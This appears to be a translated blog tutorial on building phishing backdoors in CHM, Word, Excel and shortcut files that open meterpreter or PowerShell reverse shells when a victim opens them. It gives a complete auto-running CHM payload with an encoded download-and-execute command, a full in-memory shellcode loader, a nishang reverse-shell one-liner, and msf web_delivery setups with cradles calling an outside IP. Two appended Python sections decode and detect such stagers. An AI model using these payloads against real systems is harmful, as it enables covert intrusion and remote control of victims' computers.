When documents meet PowerShell

Building a backdoor with a CHM file

Goal: build a .chm file that, when the victim opens it, spawns a meterpreter session back to us.

References: https://evi1cg.me/archives/chm_backdoor.html

https://evi1cg.me/archives/121.html

Respect to evi1cg; that blog is all solid, practical material.

Software used: EasyCHM to compile the .chm.

First create a working directory, then a few subdirectories and an index.html inside it.

Contents of index.html (flesh it out with real-looking content so the help file is believable):

<!DOCTYPE html><html><head><title>Book Catalog</title></head><body>
Book catalog.
<!-- HTML Help ActiveX control; its "ShortCut" command runs the program given in Item1 -->
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=0 height=0>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<!-- Item1 holds the command line: rundll32 runs a javascript: URL that uses WScript.Shell to launch PowerShell with the encoded stager -->
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADUALgAxADUAOQAuADEANAA1AC4AOQAyAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQB2AC4AcABzADEAJwApADsAcgBlAHYACgA=",0,true)'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<!-- fire the shortcut as soon as the page renders; no user click needed -->
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

where

C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAxADUALgAxADUAOQAuADEANAA1AC4AOQAyAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQB2AC4AcABzADEAJwApADsAcgBlAHYACgA=

is the command that ends up executing on the target host. The doubled backslashes are JavaScript string escapes inside Item1; the path points at the 32-bit PowerShell on 64-bit Windows (see the x64 note further down).

The base64 string was produced with:

cat powershell.txt | iconv --to-code UTF-16LE | base64

Decoded, it is just a command that fetches a remote script and runs it:

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -ep bypass IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev

where the contents of

http://x.x.x.x/powershell/rev.ps1

are:

function rev {
# P/Invoke declarations for the two kernel32 calls the loader needs
$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
# connect to the reverse_tcp handler, which first sends the stage length as 4 bytes
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('x.x.x.x', 2333) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
# buffer = 5-byte prefix + stage; 0xBF is x86 "mov edi, imm32", so the stage finds the socket in edi, as msf's own stagers arrange
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
# read the stage one byte at a time behind the prefix
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
# patch the socket handle into the mov operand
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
# allocate RWX memory (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) and copy the buffer in; ToInt32 means 32-bit process only
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
# run it on a new thread and keep the host process alive; the catch swallows any error so nothing is shown to the user
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Seconds 86400}catch{}
}

msf listens with a windows/meterpreter/reverse_tcp handler (exploit/multi/handler).

x86:

powershell -nop -W Hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev"

On x64 Windows you must use the 32-bit PowerShell:

C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -nop -W Hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev"

// The stage that windows/meterpreter/reverse_tcp delivers is x86 code, and rev.ps1 itself assumes 32-bit pointers ($x.ToInt32()), so it only works inside a 32-bit process; on 64-bit Windows that is the SysWOW64 powershell.exe (on 32-bit Windows that directory does not exist, so the System32 path applies there). The original note records that launching it from the 64-bit PowerShell produced an SSL/openssl error; related: http://kali.daxueba.net/?p=266
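Added example (mine, not code from this post or from evi1cg's write-up): Python that produces the same bytes as the `iconv --to-code UTF-16LE | base64` step, decodes such blobs back, and extracts the Item1 command line plus any -enc blob from an HTML Help ShortCut object laid out like the index.html above. The sample HTML and the stager string are constructed for the example; the host is the page's `x.x.x.x` placeholder.

```python
"""Added example: build/decode PowerShell -EncodedCommand blobs and pull
them out of HTML Help (CHM) ShortCut objects. Not code from the original post."""
import base64
import re

# CLSID of the HTML Help ActiveX control; its "ShortCut" command runs an
# arbitrary program. Same object as in the page's index.html.
HH_SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed stager for the example (placeholder host, as in the post).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/powershell/rev.ps1');rev"


def encode_command(ps: str) -> str:
    """Same bytes as `iconv --to-code UTF-16LE | base64`: -EncodedCommand is
    base64 over the UTF-16LE encoding of the script text."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; what an analyst runs on a captured -enc blob."""
    return base64.b64decode(blob).decode("utf-16-le")


# Constructed CHM page source following the layout of index.html above.
SAMPLE_HTML = f"""<OBJECT id=x classid="clsid:{HH_SHORTCUT_CLSID}" width=0 height=0>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell.exe -ep bypass -enc {encode_command(STAGER)}",0,true)'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>"""

_OBJECT_RE = re.compile(
    r"<OBJECT\b[^>]*clsid:" + HH_SHORTCUT_CLSID + r"[^>]*>(.*?)</OBJECT>", re.I | re.S)
_ITEM1_RE = re.compile(r"""<PARAM\s+name=["']?Item1["']?\s+value=(["'])(.*?)\1""", re.I | re.S)
# -e / -ec / -enc / -EncodedCommand followed by a base64 token; -ep and -exec do not match
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def extract_shortcut_payloads(html: str) -> list:
    """For every HH ShortCut object in CHM page source, return the Item1
    command line and the decoded text of any -EncodedCommand blob in it."""
    found = []
    for obj in _OBJECT_RE.finditer(html):
        body = obj.group(1)
        if not re.search(r"""name=["']?Command["']?\s+value=["']?ShortCut""", body, re.I):
            continue
        for item in _ITEM1_RE.finditer(body):
            cmdline = item.group(2)
            found.append({
                "item1": cmdline,
                "decoded": [decode_command(b) for b in _ENC_RE.findall(cmdline)],
            })
    return found


if __name__ == "__main__":
    for hit in extract_shortcut_payloads(SAMPLE_HTML):
        print(hit["item1"])
        for cmd in hit["decoded"]:
            print("  decoded:", cmd)
```

Two checks fall out of this. `encode_command("IEX")` gives `SQBFAFgA`, the prefix of the page's blob, and `encode_command("rev\n")` ends in `CgA=`, which is exactly how the page's blob ends: `cat` passes the file's trailing newline, so the encoded command carries an encoded `\n`. PowerShell runs it anyway, but `printf '%s' "$cmd" | iconv -t UTF-16LE | base64 -w0` gives a clean, unwrapped blob (GNU base64 otherwise wraps at 76 columns).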

Building a Word PowerShell backdoor

Built with nishang, using Invoke-PowerShellTcpOneLine.ps1 together with nc.

Open Invoke-PowerShellTcpOneLine.ps1; the one-liner in the comment block at the top is a plain TCP reverse shell (read a line, iex it, send the output back with a "PS path>" prompt):

$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Change the IP and port to your listener, then encode it with Invoke-Encode.ps1:

PS G:\Desktop\tools\nishang\Utility> . .\Invoke-Encode.ps1
PS G:\Desktop\tools\nishang\Utility> Invoke-Encode -DataToEncode '$client = New-Object System.Net.Sockets.TCPClient("115.x.x.92",2333);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' -IsString -PostScriptCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt

That writes encodedcommand.txt; copy its contents and use Out-Word.ps1 to generate the document.

Contents of encodedcommand.txt:

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TZFda8IwFIbvB/sPh9KNhNnQj3WgZcJWtiEMlVXYhXgR24PtrFXsESfqf1/S2s6rHML78ZzEjPMMC4JnGOLeGs1/MCaIDiXhSgyRRLSOl0ilmITjsFIyw3F84fhd4Tz6ousaHdfzPB6YJW1RrlSQWUeKD6SoumM8mM4PhNPZzNRnqUS2EE++7/mnu6N9DvZpliNjZqbtdZD4QpmwWt8BuwP1KD6xWFDKOVgFgs2PgZlIksrHrhawJocNDuUKm1Um+EviJQoHg7ciXidZseAXPjU2Lbok05tgkcxlvNShGf5C3eD27x04wWhHVm2DK6kLFXljfABjHIGhTrbZJ1yMJaX6sg/GxaMKdfyUNBhemGa9XsVYsb1qJvbf0D6x+N5mhKzNUdzt3DxPq33Pd2XK+DlofiXM1yUyfnvzBw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Because this goes inside a single-quoted PowerShell string, double every single quote in it ('' for each '), then run Out-Word.ps1:

PS G:\Desktop\tools\nishang\Client> . .\Out-Word.ps1
PS G:\Desktop\tools\nishang\Client> Out-Word -Payload 'powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(''TZFda8IwFIbvB/sPh9KNhNnQj3WgZcJWtiEMlVXYhXgR24PtrFXsESfqf1/S2s6rHML78ZzEjPMMC4JnGOLeGs1/MCaIDiXhSgyRRLSOl0ilmITjsFIyw3F84fhd4Tz6ousaHdfzPB6YJW1RrlSQWUeKD6SoumM8mM4PhNPZzNRnqUS2EE++7/mnu6N9DvZpliNjZqbtdZD4QpmwWt8BuwP1KD6xWFDKOVgFgs2PgZlIksrHrhawJocNDuUKm1Um+EviJQoHg7ciXidZseAXPjU2Lbok05tgkcxlvNShGf5C3eD27x04wWhHVm2DK6kLFXljfABjHIGhTrbZJ1yMJaX6sg/GxaMKdfyUNBhemGa9XsVYsb1qJvbf0D6x+N5mhKzNUdzt3DxPq33Pd2XK+DlofiXM1yUyfnvzBw=='')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();'
Saved to file G:\Desktop\tools\nishang\Client\Salary_Details.doc
0

Done. Start the listener and a PowerShell shell comes back when the document is opened. On a machine with macros enabled there is no prompt at all; with macros disabled the user sees the enable-macros prompt:

nc -lvv -p port

Building an Excel PowerShell backdoor

Set up the msf listener and start the web server that hosts the script for remote loading:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2                        // target 2 is PSH (PowerShell)
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set URIPATH /                       // serve the stager at the root
URIPATH => /
msf exploit(web_delivery) > set LHOST 115.x.x.92                // public IP the target connects back to
LHOST => 115.x.x.92
msf exploit(web_delivery) > set reverselistenerbindaddress 127.0.0.1   // address the handler actually binds on the box running msf; differs from LHOST because the public IP is port-forwarded here
reverselistenerbindaddress => 127.0.0.1
msf exploit(web_delivery) > run
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 127.0.0.1:4444             // change with set LPORT 6666
[*] Using URL: http://0.0.0.0:8080/                           // change with set SRVPORT 8081
[*] Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http://115.x.x.92:/');

Note: generalizing

What web_delivery does here is stand up a web server that serves the stager and listen for the callback. By the same logic, the web server that serves the script can be anything of our own. For example, host a script on our own server at http://115.x.x.92/powershell/rev.ps1 and let msf listen with exploit/multi/handler and payload windows/meterpreter/reverse_tcp. That URL can then serve as the payload URL for any of the phishing backdoors (rev.ps1 as shown above only defines the function, so the served script must also call rev, as the one-liners above do). For Excel:

Out-Excel -PayloadURL http://115.x.x.92/powershell/rev.ps1 -OutputFile pshExcel.xls

Forward local 8080 to public-ip:8080 and local 4444 to public-ip:4444; then running the following on an external host gives a shell straight away:

powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://<public-ip>:8080/');
// which can be shortened to (dropping the system-proxy handling)
powershell.exe -nop -w hidden -c $K=new-object net.webclient;IEX $K.downloadstring('http://115...92:2333/');
// or
powershell.exe -nop -w hidden -c iex (New-Object Net.WebClient).DownloadString('http://115...92:8080')

Here Out-Excel.ps1 builds the Excel phishing file:

PS G:\Desktop\tools\nishang\Client> . .\Out-Excel.ps1
PS G:\Desktop\tools\nishang\Client> Out-Excel -PayloadURL http://115.x.x.92:8080/ -OutputFile pshExcel.xls
Saved to file pshExcel.xls

Open pshExcel.xls and a meterpreter session comes back.
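Detection side, as an added example (not from the post): every variant above is powershell.exe with -nop, -w hidden, -exec/-ep bypass or -enc plus a DownloadString/IEX cradle, launched by a process that should not be spawning PowerShell (EXCEL.EXE, WINWORD.EXE, hh.exe, or rundll32.exe in the CHM trick). The Python below scores constructed process-creation records (image, parent image, command line) against those indicators; the field names and sample events are assumptions made for the example, not a particular EDR's schema.

```python
"""Added example: flag process-creation records that look like the
web_delivery / document-macro PowerShell stagers above. Constructed
sample events, not real telemetry; not code from the original post."""
import re

# Command-line switches the stagers lean on (abbreviations included).
SWITCHES = {
    "noprofile": r"-nop(?:rofile)?\b",
    "hidden_window": r"-w(?:indow(?:style)?)?\s+hidden\b",
    "exec_bypass": r"-e(?:xec|p|xecutionpolicy)\s+bypass\b",
    "encoded_command": r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
}
# Download-cradle vocabulary used by every variant on the page.
CRADLE = {
    "iex": r"\biex\b|invoke-expression",
    "webclient": r"net\.webclient",
    "downloadstring": r"\.downloadstring\(",
    "frombase64": r"frombase64string",
}
# Parents that should not normally spawn PowerShell: Office, HTML Help,
# rundll32 (the CHM trick above) and mshta, another script host.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "hh.exe", "rundll32.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_process(event: dict) -> dict:
    """Return the indicators hit and a verdict for one process-creation event
    (assumed fields: image, parent_image, command_line)."""
    if _basename(event["image"]) != "powershell.exe":
        return {"suspicious": False, "indicators": []}
    cmd = event["command_line"]
    switches = [n for n, p in SWITCHES.items() if re.search(p, cmd, re.I)]
    cradle = [n for n, p in CRADLE.items() if re.search(p, cmd, re.I)]
    parent = _basename(event["parent_image"])
    doc_parent = parent in DOCUMENT_PARENTS
    indicators = switches + cradle + ([f"parent:{parent}"] if doc_parent else [])
    # A cradle with stealth switches or a document parent is the stager itself;
    # an encoded command launched from a document is worth a look on its own.
    suspicious = (bool(cradle) and (bool(switches) or doc_parent)) or (
        doc_parent and "encoded_command" in switches)
    return {"suspicious": suspicious, "indicators": indicators}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed; command lines mirror the page's variants
    {"image": PS, "parent_image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "command_line": "powershell.exe -nop -w hidden -c $K=new-object net.webclient;"
                     "$K.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                     "$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
                     "IEX $K.downloadstring('http://x.x.x.x:8080/');"},
    {"image": PS, "parent_image": r"C:\Windows\hh.exe",
     "command_line": "powershell.exe -nop -w hidden -c iex (New-Object Net.WebClient)"
                     ".DownloadString('http://x.x.x.x:8080')"},
    {"image": PS32, "parent_image": r"C:\Windows\System32\rundll32.exe",
     "command_line": PS32 + " -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"image": PS, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -Command Get-Process"},
]


def verdicts(events=SAMPLE_EVENTS) -> list:
    """Verdict per event, in order; the three stager shapes are flagged, the
    scheduled script and the interactive cmdlet are not."""
    return [score_process(e)["suspicious"] for e in events]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        r = score_process(e)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["indicators"])
```

The regexes are deliberately loose on the switch spellings because powershell.exe accepts any unambiguous prefix (-w, -win, -windowstyle), which is exactly what the one-liners above exploit to stay short; a rule that only looks for the long form misses all of them.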

Building a CHM PowerShell backdoor with Out-CHM (flashes a console window)

Reuse the web_delivery listener setup above.

Script:

PS G:\Desktop\tools\nishang\Client> . .\Out-CHM.ps1
PS G:\Desktop\tools\nishang\Client> Out-CHM -PayloadURL http://192.168.52.129:8080/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
// -HHCPath is the install directory of HTML Help Workshop, whose hhc.exe compiles the .chm

The drawback is the black console window that pops up; the first CHM method above is preferable.

Building a shortcut (.lnk) PowerShell backdoor

Reuse the web_delivery listener setup above.

Script:

PS G:\Desktop\tools\nishang\Client> . .\Out-Shortcut.ps1
Out-Shortcut -PayloadURL http://115.x.x.92:8080 -HotKey 'F3' -Icon 'notepad.exe'

PayloadURL is the web_delivery URL, Icon is the icon the shortcut displays, and HotKey is the key that triggers it.

That's all.